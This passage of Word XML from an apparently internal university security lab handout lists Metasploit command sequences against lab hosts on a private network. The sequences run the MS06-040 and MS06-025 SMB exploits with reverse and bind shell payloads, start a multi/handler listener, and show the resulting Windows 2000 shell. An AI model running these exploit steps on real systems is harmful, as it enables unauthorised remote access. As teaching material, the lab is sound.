      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 &gt; ping 192.168.1.120</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="00A54AB5" w14:paraId="03243082" w14:textId="55E63017">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E" w:rsidR="008E3F20">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> search ms06_040</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00591A0C" w:rsidP="009F5AB1" w:rsidRDefault="00591A0C" w14:paraId="304846CA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="1E6596EA" w14:textId="5FD074B8">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms06_040_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="597A1E93" w14:textId="5B1A9FAB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set payload windows/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="3CF3D853" w14:textId="276C4162">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set RHOST</w:t>
      </w:r>
      <w:r w:rsidR="00DE4DB2">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidR="00591A0C">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00DE4DB2">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E" w:rsidR="00DE4DB2">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidR="00591A0C">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="71BEC9B5" w14:textId="7F151368">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A35EBC" w:rsidR="00A35EBC" w:rsidP="009F5AB1" w:rsidRDefault="00A35EBC" w14:paraId="646204E8" w14:textId="7DB9C54D">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set LPORT 44</w:t>
      </w:r>
      <w:r>
        <w:t>77</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="3F4D11A0" w14:textId="66966F92">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">set TARGET </w:t>
      </w:r>
      <w:r w:rsidR="00DE4DB2">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="0AA9FE1F" w14:textId="3443185E">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="36869A51" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>session -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="008E3F20" w:rsidP="00BE4F33" w:rsidRDefault="008E3F20" w14:paraId="64DAF1F6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:t>Microsoft Windows 2000 [Version 5.00.2195]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="008E3F20" w:rsidP="00BE4F33" w:rsidRDefault="008E3F20" w14:paraId="3E8150B8" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:t>C:\WINNT\system32&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="4B85CEDE" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc20808978" w:id="57"/>
      <w:r>
        <w:t>use windows/smb/ms06_025_rras</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="0585DF74" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>use windows/smb/ms06_025_rras</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="7BDA1311" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/shell_bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="781A80A3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set SMBPIPE SRVSVC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="2BC5EB05" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set RHOSTS 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="62D5F7C1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set TARGET 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="458E9841" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="0A73DA19" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="19829473" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>use scanner/smb/pipe_auditor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="4185CF6D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/shell_bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="457365A9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set RHOSTS 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="770FCECC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set TARGET 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB201B" w:rsidP="00CB201B" w:rsidRDefault="00CB201B" w14:paraId="6D06BD00" w14:textId="347D501C">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E" w:rsidR="789E8739">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc160114253" w:id="58"/>
      <w:bookmarkStart w:name="_Toc145594640" w:id="59"/>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00CD51A3" w:rsidP="006F6D1B" w:rsidRDefault="0093673A" w14:paraId="37863C06" w14:textId="71E804A2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>exploit/multi/handler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="00F16D27" w:rsidP="00F16D27" w:rsidRDefault="00F16D27" w14:paraId="3FBDDDC5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16D27" w:rsidP="00F16D27" w:rsidRDefault="00F16D27" w14:paraId="71F19752" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16D27" w:rsidP="00F16D27" w:rsidRDefault="00F16D27" w14:paraId="5C470CF0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16D27" w:rsidP="00F16D27" w:rsidRDefault="00F16D27" w14:paraId="2CC83F9C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F16D27" w:rsidP="00F16D27" w:rsidRDefault="00F16D27" w14:paraId="193D1725" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16D27" w:rsidP="00F16D27" w:rsidRDefault="00F16D27" w14:paraId="57ADA741" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve"> ping 192.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00CD51A3" w:rsidP="009F5AB1" w:rsidRDefault="00514D34" w14:paraId="43D22782" w14:textId="56865600">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="00CD51A3">
        <w:t>exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00CD51A3" w:rsidP="009F5AB1" w:rsidRDefault="00CD51A3" w14:paraId="704289F4" w14:textId="6BE923DC">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set RHOST</w:t>
      </w:r>
      <w:r w:rsidR="00C0074E">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve"> 192.168.1.110</w:t>
      </w:r>
      <w:r w:rsidR="00C0074E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="00C0074E">
        <w:t>192.168.1.11</w:t>
      </w:r>
      <w:r w:rsidR="00C0074E">
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00CD51A3" w:rsidP="009F5AB1" w:rsidRDefault="00CD51A3" w14:paraId="509540F0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set TARGET 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00CD51A3" w:rsidP="009F5AB1" w:rsidRDefault="00CD51A3" w14:paraId="08E91E71" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00CD51A3" w:rsidP="009F5AB1" w:rsidRDefault="00CD51A3" w14:paraId="72419410" w14:textId="037FAA7D">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set LPORT 44</w:t>
      </w:r>
      <w:r w:rsidR="002F78AD">
        <w:t>99</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00CD51A3" w:rsidP="009F5AB1" w:rsidRDefault="4A983FA8" w14:paraId="528662AD" w14:textId="7F371D26">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidR="032601DC">
        <w:rPr/>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00CD51A3">
        <w:rPr/>
        <w:t>heck</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00CD51A3" w:rsidP="009F5AB1" w:rsidRDefault="00CD51A3" w14:paraId="43291D08" w14:textId="34BAF9E5">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidP="00F16D27" w:rsidRDefault="3090B820" w14:paraId="49B772A6" w14:textId="0D6F43A9">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Lưu </w:t>
      </w:r>
      <w:r w:rsidR="419B563E">
        <w:t>hành nội bộ)</w:t>
      </w:r>
      <w:r w:rsidR="00CD51A3">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidP="00F16D27" w:rsidRDefault="0031173D" w14:paraId="63E69325" w14:textId="42D2E2DA">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>-----------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidRDefault="0022224F" w14:paraId="1FA7DBDE" w14:textId="77777777"/>
    <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidRDefault="0022224F" w14:paraId="05AA9CEF" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidRDefault="0022224F" w14:paraId="7D5322A9" w14:textId="77777777"/>
    <w:sectPr w:rsidRPr="009B135C" w:rsidR="0022224F">
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="default" r:id="rId18"/>
      <w:pgSz w:w="11907" w:h="16840" w:orient="portrait"/>
      <w:pgMar w:top="1134" w:right="1134"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5E5BB9" w:rsidRDefault="005E5BB9" w14:paraId="585EDC8A" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005E5BB9" w:rsidRDefault="005E5BB9" w14:paraId="7E8D71EB" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="005E5BB9" w:rsidRDefault="005E5BB9" w14:paraId="3DFAB9C0" w14:textId="77777777">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6153515"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w:rsidR="0022224F" w:rsidRDefault="00F458FF" w14:paraId="5E0605A0" w14:textId="6B0A3DEF">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:tabs>
            <w:tab w:val="right" w:pos="9639"/>
          </w:tabs>
          <w:ind w:firstLine="0"/>
        </w:pPr>
        <w:r w:rsidRPr="009600BA">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
          </w:rPr>
          <w:t>Khoa CNTT – Trường ĐHBK</w:t>
        </w:r>
        <w:r w:rsidRPr="009600BA" w:rsidR="009600BA">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
          </w:rPr>
          <w:t>, ĐHĐN</w:t>
        </w:r>
        <w:r w:rsidR="0031173D">
          <w:tab/>
        </w:r>
        <w:r w:rsidR="0031173D">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0031173D">
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidR="0031173D">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="0031173D">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="0031173D">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="0022224F" w:rsidRDefault="0022224F" w14:paraId="2812C26A"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5E5BB9" w:rsidRDefault="005E5BB9" w14:paraId="12991AD6" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005E5BB9" w:rsidRDefault="005E5BB9" w14:paraId="28266F35" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="005E5BB9" w:rsidRDefault="005E5BB9" w14:paraId="3BE97288" w14:textId="77777777">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C564D3" w:rsidP="00C564D3" w:rsidRDefault="00C564D3" w14:paraId="78180FEF" w14:textId="0D8DF57D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A0F82C5" wp14:editId="568C0756">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6118860</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-190500</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="274955" cy="274955"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="467932070" name="Picture 467932070"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Logo&#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4955" cy="27495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CA02F0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FCA9F5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8549D3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43A5E6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BE2E448"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF81"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C5A03B54"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF82"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CC240166"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF83"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9BF0BF88"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF88"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F68E65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A7ADD22"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="06505BC2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8DAA38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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="143A32C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDEE51F0"/>
    <w:lvl w:ilvl="0" w:tplc="E4588E52">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="txtGachDong"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="721" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:effect w:val="none"/>
        <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0" w:frame="1"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FE0EED78">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="144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2" w:tplc="997CA0DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="216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3" w:tplc="D3DC1C98">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:u w:val="none" w:color="000000"/>
        <w:effect w:val="none"/>
        <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0" w:frame="1"/>
